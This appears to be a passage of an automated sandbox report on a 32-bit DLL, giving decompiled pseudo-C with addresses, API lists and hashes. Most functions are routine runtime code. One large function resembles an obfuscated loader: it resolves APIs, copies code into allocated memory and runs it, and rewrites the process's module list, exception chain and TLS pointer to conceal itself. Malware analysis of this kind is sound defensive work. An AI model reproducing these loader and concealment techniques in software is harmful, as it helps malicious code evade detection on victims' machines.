						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x6d55dfd0; // 0xb09328
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}










            0x6d50e229
            0x6d50e22b
            0x6d50e22f
            0x6d50e238
            0x6d50e243
            0x6d50e253
            0x6d50e257
            0x6d50e25a
            0x6d50e26c
            0x6d50e25c
            0x6d50e25f
            0x6d50e268
            0x6d50e261
            0x6d50e261
            0x6d50e263
            0x6d50e25f
            0x6d50e26e
            0x6d50e276
            0x6d50e27b
            0x6d50e28a
            0x6d50e281
            0x6d50e282
            0x6d50e282
            0x6d50e28e
            0x6d50e2ae
            0x6d50e2b2
            0x6d50e2b9
            0x6d50e2c0
            0x6d50e2c2
            0x6d50e2c5
            0x6d50e2c5
            0x6d50e290
            0x6d50e290
            0x6d50e295
            0x6d50e29b
            0x6d50e2a6
            0x6d50e2a8
            0x6d50e2a8
            0x6d50e29d
            0x6d50e29d
            0x6d50e29d
            0x6d50e29b
            0x6d50e24b
            0x6d50e24b
            0x6d50e24b
            0x6d50e2cc
            0x6d50e2cd
            0x6d50e2d9

            APIs
            • GetStdHandle.KERNEL32(000000F6), ref: 6D50E270
            • GetFileType.KERNELBASE(00000000), ref: 6D50E282
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: FileHandleType
            • String ID:
            • API String ID: 3000768030-0
            • Opcode ID: dd51fb676e27791472f6dce8a8f9a0efc06d4fdbd07d9f3feac53dbf31987345
            • Instruction ID: 1e0e458e67e088439fbce021ffa6dc79686668c44c3b7f18397567532d2a09cf
            • Opcode Fuzzy Hash: dd51fb676e27791472f6dce8a8f9a0efc06d4fdbd07d9f3feac53dbf31987345
            • Instruction Fuzzy Hash: F811D632108B4386DB399A3ECC89322BAA5AB97330B350F1AD4B6D7DE1C730D486C600
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D506B43 Relevance: 3.0, APIs: 2, Instructions: 37memoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 148 6d506b43-6d506b61 149 6d506b63-6d506b6e GetProcessHeap 148->149 150 6d506bb6-6d506bb9 148->150 151 6d506b70-6d506b74 RtlFreeHeap 149->151 152 6d506b7a-6d506ba0 149->152 151->152 152->150 153 6d506ba2 152->153 154 6d506ba4-6d506bb4 153->154 154->150 154->154
            C-Code - Quality: 100%
            			E6D506B43(intOrPtr _a4, signed int _a8) {
				signed int _t18;
				void* _t19;
				signed int _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t29;

				_t25 = _a8;
				_t29 = _a4;
				_t28 =  *(_t29 + 0x8c);
				_t18 =  *(_t29 + 0x148) | _t25;
				 *((intOrPtr*)(_t29 + 0x3c)) =  *((intOrPtr*)(_t29 + 0x3c)) - _t18;
				if(_t28 != 0) {
					_t19 = GetProcessHeap();
					 *((intOrPtr*)(_t29 + 0x30)) =  *((intOrPtr*)(_t29 + 0x30)) + _t25;
					if(_t19 != 0) {
						RtlFreeHeap(_t19, 0, _t28); // executed
					}
					 *(_t29 + 0xc4) =  *(_t29 + 0xc4) |  *((intOrPtr*)(_t29 + 0x88)) + 0x00000118;
					_t18 =  *((intOrPtr*)( *((intOrPtr*)(_t29 + 0x1d4)) + 0x4c)) + 0x898;
					if(_t18 != 0x2ea7) {
						_t27 = 0x2ea7 - _t18;
						do {
							_t18 =  *(_t29 + 0x124);
							 *(_t18 + 0x24) =  *(_t18 + 0x24) | 0x0000081a;
							_t27 = _t27 - 1;
						} while (_t27 != 0);
					}
				}
				return _t18;
			}









            0x6d506b44
            0x6d506b49
            0x6d506b54
            0x6d506b5a
            0x6d506b5c
            0x6d506b61
            0x6d506b63
            0x6d506b69
            0x6d506b6e
            0x6d506b74
            0x6d506b74
            0x6d506b8a
            0x6d506b99
            0x6d506ba0
            0x6d506ba2
            0x6d506ba4
            0x6d506ba4
            0x6d506baa
            0x6d506bb1
            0x6d506bb1
            0x6d506ba4
            0x6d506ba0
            0x6d506bb9

            APIs
            • GetProcessHeap.KERNEL32(00000532,?,-00000484,6D5155FB,?,00002B78,?,6D51A458,?,?,6D515142,?,?,?,?,?), ref: 6D506B63
            • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 6D506B74
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: Heap$FreeProcess
            • String ID:
            • API String ID: 3859560861-0
            • Opcode ID: dba6e01c95109f24d5005f6a89051358fc16824115a5b0717516e5b75578e8a5
            • Instruction ID: e5868095f0a70c8b1806ffdf6a1a42caca46f69d162f13d52939ecf28a8c213b
            • Opcode Fuzzy Hash: dba6e01c95109f24d5005f6a89051358fc16824115a5b0717516e5b75578e8a5
            • Instruction Fuzzy Hash: C40131766017029FEB68DB79CA85B96B7F4FF55321F01882DE5AAC3A40DB70F8408B51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D50B523 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 155 6d50b523-6d50b52e 156 6d50b530-6d50b53a 155->156 157 6d50b53c-6d50b542 155->157 156->157 158 6d50b570-6d50b57b call 6d50bf62 156->158 159 6d50b544-6d50b545 157->159 160 6d50b55b-6d50b56c RtlAllocateHeap 157->160 164 6d50b57d-6d50b57f 158->164 159->160 161 6d50b547-6d50b54e call 6d50e89b 160->161 162 6d50b56e 160->162 161->158 168 6d50b550-6d50b559 call 6d50e440 161->168 162->164 168->158 168->160
            C-Code - Quality: 95%
            			E6D50B523(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6d55dd9c, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6D50E89B();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6D50BF62())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6D50E440(_t15, _t16, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}











            0x6d50b523
            0x6d50b529
            0x6d50b52e
            0x6d50b53c
            0x6d50b53c
            0x6d50b542
            0x6d50b544
            0x6d50b544
            0x6d50b55b
            0x6d50b564
            0x6d50b56c
            0x00000000
            0x00000000
            0x6d50b54c
            0x6d50b54e
            0x6d50b570
            0x6d50b575
            0x6d50b57b
            0x00000000
            0x6d50b57b
            0x6d50b551
            0x6d50b556
            0x6d50b557
            0x6d50b559
            0x00000000
            0x00000000
            0x6d50b559
            0x00000000
            0x6d50b55b
            0x6d50b534
            0x6d50b535
            0x6d50b53a
            0x00000000
            0x00000000
            0x00000000

            APIs
            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,6D50C909,00000001,00000364,?,6D50B06B,00000001,00000001), ref: 6D50B564
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 416a99699eed813a63527157329eed2eabf9a2cda9a6c289b6abbac09fcd6f18
            • Instruction ID: a8d537adba703a09d85395ba6be132989cfe8e3d70b269524275c5e12efb1edd
            • Opcode Fuzzy Hash: 416a99699eed813a63527157329eed2eabf9a2cda9a6c289b6abbac09fcd6f18
            • Instruction Fuzzy Hash: F1F02B3174412596DB197A25688471A3B58AF91760F168491ED14D6DC0FB20DD0045A1
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 6D50391B Relevance: 8.1, APIs: 5, Instructions: 583librarymemoryloaderCOMMONCrypto
            Download Yara Rule
            C-Code - Quality: 86%
            			E6D50391B() {
				intOrPtr _t375;
				signed int _t376;
				signed int _t413;
				signed int _t480;
				signed int _t491;
				int _t503;
				void* _t532;
				signed int _t537;
				signed int* _t557;
				signed int _t585;
				signed int _t590;
				signed int* _t591;
				signed int* _t592;
				intOrPtr _t596;
				signed int _t597;
				intOrPtr _t599;
				signed int _t600;
				signed int _t607;
				void* _t608;
				signed int _t609;
				signed int _t617;
				signed int _t618;
				signed int _t633;
				signed int _t634;
				signed int _t635;
				signed int _t639;
				signed int _t643;
				signed int _t645;
				signed int _t653;
				void* _t655;
				signed int _t662;
				signed int _t663;
				signed int _t665;
				signed int _t666;
				signed int _t669;
				signed int _t670;
				signed int _t673;
				signed int _t678;
				signed int _t680;
				signed int _t682;
				signed int _t685;
				signed int _t686;
				signed int _t687;
				signed int _t690;
				signed int _t692;
				signed int _t693;
				signed int _t697;
				void* _t698;
				signed int _t702;
				signed int _t704;
				void* _t712;

				_t597 =  *(_t712 + 0x4c);
				 *((intOrPtr*)(_t712 + 4)) =  *((intOrPtr*)(_t712 + 0x3c)) + 0x7e8;
				_t375 =  *((intOrPtr*)(_t712 + 0x34));
				_t704 = _t375 - 0x2b78;
				 *(_t712 + 0x1c) = 0x2ea5;
				_t590 = _t375 + 0x118;
				 *(_t712 + 0x20) = _t704;
				_t376 =  *(_t712 + 0x50);
				_t682 = _t597 + 0xb37;
				 *(_t712 + 0x5c) = _t682;
				 *(_t712 + 0x14) = _t597 + 0x792;
				_t662 = _t704;
				 *(_t712 + 0x4c) = _t590;
				_t599 = _t376 + 0xa7f;
				 *(_t712 + 0x40) = _t662;
				_t692 = _t376 + 0xcc0;
				 *((intOrPtr*)(_t712 + 0x18)) = _t599;
				 *(_t712 + 0x50) = _t692;
				if(_t599 <= _t704 + 0x24ad) {
					_t591 =  *(_t712 + 0x60);
					L8:
					_t663 =  *(_t712 + 0x4c);
					L9:
					if(_t682 ==  *(_t712 + 0x10) + 0xfffffc3c) {
						L58:
						if(_t682 <  *(_t712 + 0x10) + 0xfffffbc6) {
							_t693 =  *(_t712 + 0x14);
							if(_t591[0xa] != _t591[0x49] * _t693) {
								_t591[0x36] = _t591[0x36] + ((_t591[0x4f] | 0x00002ac3) ^ _t693);
							}
							_t600 = _t591[0x22];
							_t591[0x75] = _t591[0x75] + _t591[0x5a] -  *(_t712 + 0x40) + _t663;
							_push(_t600 ^  *(_t712 + 0x50) ^  *(_t712 + 0x10));
							_push(_t591);
							_t591[0x64] = _t591[0x64] - ( *(_t712 + 0x50) ^ 0x00001e7b) * _t600;
							_push(_t591[0x17] * _t591[0xf] * 0x24ad);
							_push(0);
							_push(_t591[0x1d] * 0x29b2);
							_push(_t693 ^ _t704);
							_push((_t591[0x75] - 0x1e7b) * _t591[0x35]);
							_push((_t591[0x34] ^ 0x00002ac3) - _t591[0x4c]);
							_push( ~(_t591[0x3f]));
							_push( *(_t712 + 0x64) & 0x00002ea5);
							E6D50226B();
							_t712 = _t712 + 0x28;
							_t591[0x60] = _t591[0x60] ^ _t704 & 0x000028a4;
						} else {
							_t591[0x23] = _t591[8];
							if(_t591[0x56] <= _t591[0x5a]) {
								_t591[0x12] = (_t591[0x4c] | 0x000021e9) * _t591[0x12];
							}
							E6D506B43(_t591, 0x2c90);
							_t591[0x59] = _t591[0x58];
							if(_t591[0x4f] > 0x29b2) {
								_t591[0x24] = _t591[0x24] ^ 0x00003efe;
							}
							_t413 = _t591[0x68];
							_t591[0x4f] = _t413;
							_t591[0x68] = _t413 + 1;
						}
						return  *(_t712 + 0x40) + 0x24ad;
					}
					_t591[0x62] = GetProcAddress(_t591[0x4a],  &(_t591[0x25]));
					_t591[0x5c] =  *((intOrPtr*)(_t591[0x1c] + 0x78 + ( *(_t591[0x1d] + 0x80) ^ 0x00002eac) * 8)) + _t591[0x10];
					 *((intOrPtr*)(_t591[0x14] + 0x158)) =  *((intOrPtr*)(_t591[0x14] + 0x158)) + 0x37c9;
					_t607 = _t591[0x5c];
					if(_t607 == _t591[0x10]) {
						L35:
						_t665 = _t591[4];
						_t608 = 0x1e7b;
						if( *(_t665 + 0x2c) * 0xf17697d9 < 0x1e7b) {
							L38:
							if( *((intOrPtr*)(_t591[0x22] + 0x1c)) - 0xdf < 0x260d) {
								_t591[0x34] = _t591[0x34] + 0x602f9ca;
							}
							_t591[0x63] =  *[fs:0x30];
							_t591[0x64] = _t591[0x64] + 0x4a8d;
							_t591[0xa] = _t591[0xa] ^  *(_t591[0x1d] + 0x30) * 0x00001eee;
							_t666 = _t591[0x63];
							_t609 =  *( *((intOrPtr*)(_t666 + 0xc)) + 0x14);
							_t591[0x66] = _t609;
							if(_t609 ==  *((intOrPtr*)(_t666 + 0xc)) + 0x14) {
								L51:
								_t591[0x39] = _t591[0x39] | _t591[0x4c] | 0x0000252e;
								_t591[0x78] =  *[fs:0x0];
								 *((intOrPtr*)(_t591[4] + 0xd4)) = 0x721e459;
								 *(_t591[0x49] + 0xd4) =  *(_t591[0x49] + 0xd4) ^  *(_t591[2]) * 0x00002872;
								_t663 =  *(_t712 + 0x4c) - 0xda2;
								while( *((intOrPtr*)(_t591[0x78] + 4)) >= _t591[0x65]) {
									if( *((intOrPtr*)(_t591[0x78] + 4)) >= _t591[0x77] + _t591[0x65]) {
										break;
									}
									if( *((intOrPtr*)(_t591[2] + 0x4c)) != 0x2088) {
										_t591[0x12] = _t591[0x12] + _t591[0x14] + 0x48;
									}
									_t591[9] = _t591[9] + 0xffffd370 - _t591[0x3f];
									_t591[0x78] =  *(_t591[0x78]);
									_t591[0x34] = _t591[0x40] + 0x2ab3;
									_t591[0x60] = _t591[0x60] ^  *_t591 - 0x00002597;
								}
								 *[fs:0x0] = _t591[0x78];
								_t591[0x4f] = 0xfffffd78;
								 *((intOrPtr*)(_t591[0x22] + 0x30)) =  *((intOrPtr*)(_t591[0x1d] + 0x28)) - 0x2ea5;
								_t591[0x58] =  *((intOrPtr*)(_t591[0x11] + 0x28)) + _t591[0x10];
								_t591[0x4f] =  &(_t591[9]) + _t591[0x4f];
								_t591[9] = 0x7eb9458;
								_t591[0x36] = _t591[0x36] ^ _t591[2] + 0x000024ad;
								goto L58;
							} else {
								L42:
								L42:
								if( *((intOrPtr*)(_t591[0x22] + 0x80)) - 0x102a < ( *( *_t591 + 0x80) ^ 0x00000b32)) {
									_t491 = _t591[0x3e];
									_t591[0x24] = _t591[0x24] | _t491;
									_t591[0x3e] = _t491 + 1;
								}
								_t591[0x66] = _t591[0x66] + 0xfffffff8;
								_t591[0x4f] = _t591[0x4f] |  *((intOrPtr*)(_t591[2] + 0x180)) + 0x0000252e;
								_t617 = _t591[0x66];
								if( *((intOrPtr*)(_t617 + 0x18)) > 0x6d540000 ||  *((intOrPtr*)(_t617 + 0x20)) +  *((intOrPtr*)(_t617 + 0x18)) <= 0x6d540000) {
									goto L46;
								}
								_t591[0x65] =  *(_t591[0x66] + 0x18);
								 *(_t591[0x66] + 0x18) = _t591[0x10];
								_t591[0x4c] = _t591[0x4c] +  *_t591 * 0xffffd15b;
								_t480 = _t591[9];
								_t591[0x24] = _t591[0x24] ^ _t480;
								_t591[9] = _t480 - 1;
								 *((intOrPtr*)(_t591[0x66] + 0x1c)) =  *((intOrPtr*)(_t591[0x11] + 0x28)) + _t591[0x10];
								if(_t591[0x34] != _t591[0x24]) {
									_t591[0x4c] = _t591[0x4c] + 0xffffd14d;
								}
								_t591[0x77] =  *(_t591[0x66] + 0x20);
								_t591[9] = _t591[9] - (_t591[0x56] ^ 0x000029d1);
								 *(_t591[0x66] + 0x20) =  *(_t591[0x11] + 0x50);
								goto L51;
								L46:
								_t618 =  *(_t617 + 8);
								_t591[0x66] = _t618;
								if(_t618 !=  *((intOrPtr*)(_t591[0x63] + 0xc)) + 0x14) {
									goto L42;
								}
								goto L51;
							}
						}
						_t697 =  &(_t591[0x4c]);
						do {
							_t591[0x52] = _t697;
							_t608 = _t608 + 1;
						} while (_t608 <=  *(_t665 + 0x2c) * 0xf17697d9);
						goto L38;
					}
					_t698 = VirtualAlloc(0,  *((intOrPtr*)(_t607 + 4)) -  *_t607,  *(_t591[0x14] + 0x1c) - 0x160d, 4);
					if(_t698 == 0) {
						_t682 =  *(_t712 + 0x5c);
						goto L35;
					}
					_t591[0x3a] = _t591[0x4f] * _t591[0x3a] * 0x252e;
					E6D508CD0(_t698,  *(_t591[0x5c]),  *((intOrPtr*)(_t591[0x5c] + 4)) -  *(_t591[0x5c]));
					_t712 = _t712 + 0xc;
					_t503 = _t591[0x5d]();
					_t591[0x61] = _t503;
					if(_t503 !=  *(_t591[2] + 0x1c) * 0xf148673b) {
						_push(_t698);
						_push(_t503);
						if(_t591[0x62]() != 0) {
							_t669 = VirtualAlloc(0, ( *(_t591[0x49] + 0x4c) ^ 0x0000224d) << 2, 0x1000,  *( *_t591 + 0x4c) * 0x3ade6314);
							 *(_t712 + 0x28) = _t669;
							if(_t669 == 0) {
								L32:
								_t682 =  *(_t712 + 0x5c);
								_t591[0x68] =  &(_t591[0x5e]) * _t591[0x68];
								if( *(_t591[0x75] + 0x1c) * 0x6b5b45d5 !=  *((intOrPtr*)(_t591[0x49] + 0x1c)) + 0x898) {
									_t591[0x24] = _t591[4] * 0x2ea5;
								}
								goto L35;
							}
							if( *( *(_t591[0x5c] + 8)) != 0xffffffff) {
								_t633 =  *(_t591[0x49] + 0x2c) ^ 0x00000d5d;
								if(_t633 > ( *(_t591[0x1d] + 0x1c) ^ 0x00000322)) {
									L24:
									_t685 =  *(_t591[2] + 0x1c) * 0xd587cad0;
									if(_t685 == 0x2c90) {
										L28:
										 *((intOrPtr*)(_t669 +  *( *(_t591[0x5c] + 8)) * 4)) = _t698;
										L29:
										_t634 =  *_t591;
										if(_t591[0x4c] !=  *(_t634 + 0x4c) * 0xfcb704d) {
											_t591[0x24] =  *(_t634 + 0x1a8) * 0x29b2;
										}
										_t591[0xc] = _t591[0xc] + _t591[0x24] - 0x1eee;
										 *[fs:0x2c] = _t669;
										goto L32;
									}
									_t635 = _t591[0x24];
									_t532 = 0x2c90 - _t685;
									do {
										_t635 = _t635 ^ 0x00002ea5;
										_t532 = _t532 - 1;
									} while (_t532 != 0);
									_t591[0x24] = _t635;
									goto L28;
								}
								_t686 = _t591[9];
								_t670 = _t591[0x1d];
								do {
									_t686 = _t686 + 0x2b78 - _t591[0x4c];
									_t633 = _t633 + 1;
									_t591[9] = _t686;
								} while (_t633 <= ( *(_t670 + 0x1c) ^ 0x00000322));
								_t669 =  *(_t712 + 0x28);
								goto L24;
							}
							 *_t669 = _t698;
							goto L29;
						}
						_t537 = _t591[0x24];
						_t591[0x3a] = _t591[0x3a] + _t537;
						_t591[0x24] = _t591[0x5a] * 0x000029d1 ^ _t537 + 0x00000001;
						 *(_t591[0x14] + 0xd8) =  *(_t591[0x14] + 0xd8) * 0xfffffb0d;
						_t503 = _t591[0x20] * 0xa8c4092d;
						L14:
						ExitProcess(_t503);
					}
					_t503 = _t591[7] ^ 0x0000260c;
					goto L14;
				}
				if(_t682 > _t662 + 0x29b2) {
					_t592 =  *(_t712 + 0x60);
					_t592[0x4c] = _t592[0x4c] - (_t590 ^ 0x00001eee) + _t592[0x3e];
					_t639 = _t592[0x20];
					 *(_t712 + 0x24) = (_t592[0x49] ^  *(_t712 + 0x10)) & 0x000024ad;
					_t687 = _t682 - _t592[0x12] * _t704;
					 *(_t712 + 0x5c) = _t687;
					 *(_t712 + 0x40) = _t662 + 0xffffd15b + _t639 - _t592[0x68];
					_t592[0x24] = _t592[0x24] | _t592[0x3f] ^ 0x00002c90;
					_t673 = _t592[0x5e];
					_t592[0x20] = _t639 - _t673 * _t592[0x12];
					 *(_t712 + 0x4c) =  *(_t712 + 0x4c) | _t592[0x22] * _t592[0x22];
					 *(_t712 + 0x28) = _t592[0x39] & _t592[0x31];
					_t557 =  *(_t712 + 0x60);
					_push(_t557[0x5a] ^ ( *(_t712 + 0x60))[0x75] ^ ( *(_t712 + 0x60))[2]);
					_push(_t557[0x40] +  *(_t712 + 0x14));
					_t643 =  *(_t712 + 0x28);
					_push((_t557[0x18] +  *(_t712 + 0x5c)) * _t557[9]);
					_t678 =  *(_t712 + 0x24);
					_push( *((intOrPtr*)(_t712 + 0x18)) + 0xffffd78e);
					_push( *(_t712 + 0x6c) & 0x0000252e);
					_push(_t643 ^ 0x00002ac3);
					_push(_t692 * 0x00002ab3 | _t557[0x2f]);
					_push( *(_t712 + 0x28) + _t678);
					_push((_t673 - _t687) * 0x2ac3);
					_t682 =  *(_t712 + 0x80);
					_push((_t592[0x3a] ^  *(_t712 + 0x1c)) +  *(_t712 + 0x1c));
					_t591 =  *(_t712 + 0x88);
					_push(_t643 | _t682);
					_push( *((intOrPtr*)(_t712 + 0x34)));
					_push(0);
					_push(_t678 ^ _t643);
					_push(_t591);
					_push( *(_t712 + 0x64));
					_t704 = E6D515150();
					_t645 = _t591[0x4f] |  *(_t712 + 0x80);
					_t712 = _t712 + 0x40;
					_t663 =  *(_t712 + 0x4c);
					_t591[0x75] = _t591[0x75] ^ _t645 * 0x00002b78;
					_t591[0x1d] = _t591[0x1d] | _t591[0x24] ^ 0x00002ac3;
					_t591[2] = _t591[2] - (_t591[0xb] | _t663);
					_t653 = _t591[0x49] * 0x29d1;
					_t591[0x40] = _t591[0x40] + _t591[0x64] - (_t591[0x22] |  *(_t712 + 0x40));
					if(_t682 > _t653) {
						goto L9;
					}
					_t690 = _t591[0x36] * _t591[7];
					_t702 = _t591[0x3e] ^  *(_t712 + 0x14);
					_t655 = _t653 -  *(_t712 + 0x5c) + 1;
					_t680 = _t591[0xe];
					_t596 =  *((intOrPtr*)(_t712 + 0x18));
					do {
						_t680 = _t680 + _t702;
						_t704 = _t704 * _t690;
						 *(_t712 + 0x50) =  *(_t712 + 0x50) |  *(_t712 + 0x50) + _t596;
						_t655 = _t655 - 1;
					} while (_t655 != 0);
					_t591 =  *(_t712 + 0x60);
					_t682 =  *(_t712 + 0x5c);
					_t591[0xe] = _t680;
					goto L8;
				}
				_t591 =  *(_t712 + 0x60);
				_t591[0x5d] = GetProcAddress(_t591[0x4a],  &(_t591[0x25]));
				 *(_t591[0x42]) =  *(_t591[0x14] + 0x1c) ^ 0x53734a59;
				 *((intOrPtr*)(_t591[0x14] + 0x90)) = 0x2ae7;
				 *((intOrPtr*)(_t591[0x42] + 4)) =  *((intOrPtr*)(_t591[0x75] + 0x80)) + 0x615645c0;
				_t591[0x42][2] =  *(_t591[4] + 0x1c) ^ 0x00655361;
				_t585 = _t591[0x41];
				_t591[0x2f] = _t591[0x2f] ^ _t585;
				_t591[0x41] = _t585 - 1;
				_t591[0xc] = _t591[2] ^ _t591[0xc] ^ 0x000028a4;
				goto L8;
			}






















































            0x6d503922
            0x6d50392c
            0x6d503930
            0x6d503937
            0x6d50393d
            0x6d503945
            0x6d50394b
            0x6d50394f
            0x6d503953
            0x6d50395f
            0x6d503963
            0x6d503967
            0x6d503969
            0x6d50396d
            0x6d503973
            0x6d503977
            0x6d50397d
            0x6d503987
            0x6d50398d
            0x6d503c0e
            0x6d503c12
            0x6d503c12
            0x6d503c16
            0x6d503c21
            0x6d504145
            0x6d504150
            0x6d5041c8
            0x6d5041d2
            0x6d5041e1
            0x6d5041e1
            0x6d5041f3
            0x6d5041fb
            0x6d50421b
            0x6d50421c
            0x6d50421d
            0x6d504230
            0x6d504238
            0x6d50423a
            0x6d504248
            0x6d504249
            0x6d50425b
            0x6d504264
            0x6d50426e
            0x6d50426f
            0x6d50427a
            0x6d50427d
            0x6d504152
            0x6d504155
            0x6d504167
            0x6d504178
            0x6d504178
            0x6d504181
            0x6d50418d
            0x6d50419e
            0x6d5041a0
            0x6d5041a0
            0x6d5041aa
            0x6d5041b0
            0x6d5041b7
            0x6d5041b7
            0x6d504293
            0x6d504293
            0x6d503c3a
            0x6d503c59
            0x6d503c62
            0x6d503c6c
            0x6d503c75
            0x6d503e89
            0x6d503e89
            0x6d503e91
            0x6d503e9c
            0x6d503eb6
            0x6d503ec9
            0x6d503ecb
            0x6d503ecb
            0x6d503edb
            0x6d503eeb
            0x6d503ef5
            0x6d503ef8
            0x6d503f01
            0x6d503f04
            0x6d503f12
            0x6d50402b
            0x6d50403a
            0x6d504046
            0x6d50404f
            0x6d504068
            0x6d50406e
            0x6d5040dc
            0x6d50408b
            0x00000000
            0x00000000
            0x6d504097
            0x6d50409f
            0x6d50409f
            0x6d5040ad
            0x6d5040b8
            0x6d5040c9
            0x6d5040d6
            0x6d5040d6
            0x6d5040f3
            0x6d5040fc
            0x6d504115
            0x6d504121
            0x6d50412a
            0x6d504138
            0x6d50413f
            0x00000000
            0x6d503f18
            0x00000000
            0x6d503f1d
            0x6d503f3e
            0x6d503f40
            0x6d503f46
            0x6d503f4d
            0x6d503f4d
            0x6d503f53
            0x6d503f68
            0x6d503f6e
            0x6d503f77
            0x00000000
            0x00000000
            0x6d503fb0
            0x6d503fb9
            0x6d503fc2
            0x6d503fc8
            0x6d503fcb
            0x6d503fd2
            0x6d503fe4
            0x6d503ff3
            0x6d503ff5
            0x6d503ff5
            0x6d504008
            0x6d504019
            0x6d504028
            0x00000000
            0x6d503f83
            0x6d503f83
            0x6d503f86
            0x6d503f9a
            0x00000000
            0x00000000
            0x00000000
            0x6d503f9c
            0x6d503f12
            0x6d503e9e
            0x6d503ea4
            0x6d503ea4
            0x6d503eaa
            0x6d503eb2
            0x00000000
            0x6d503ea4
            0x6d503c99
            0x6d503c9d
            0x6d503e85
            0x00000000
            0x6d503e85
            0x6d503cb6
            0x6d503ccb
            0x6d503cd0
            0x6d503cd3
            0x6d503cd9
            0x6d503ceb
            0x6d503cfc
            0x6d503cfd
            0x6d503d06
            0x6d503d6b
            0x6d503d6d
            0x6d503d73
            0x6d503e40
            0x6d503e40
            0x6d503e51
            0x6d503e74
            0x6d503e7d
            0x6d503e7d
            0x00000000
            0x6d503e74
            0x6d503d85
            0x6d503d97
            0x6d503da7
            0x6d503dd0
            0x6d503dd3
            0x6d503de1
            0x6d503dfc
            0x6d503e07
            0x6d503e0a
            0x6d503e0a
            0x6d503e19
            0x6d503e25
            0x6d503e25
            0x6d503e36
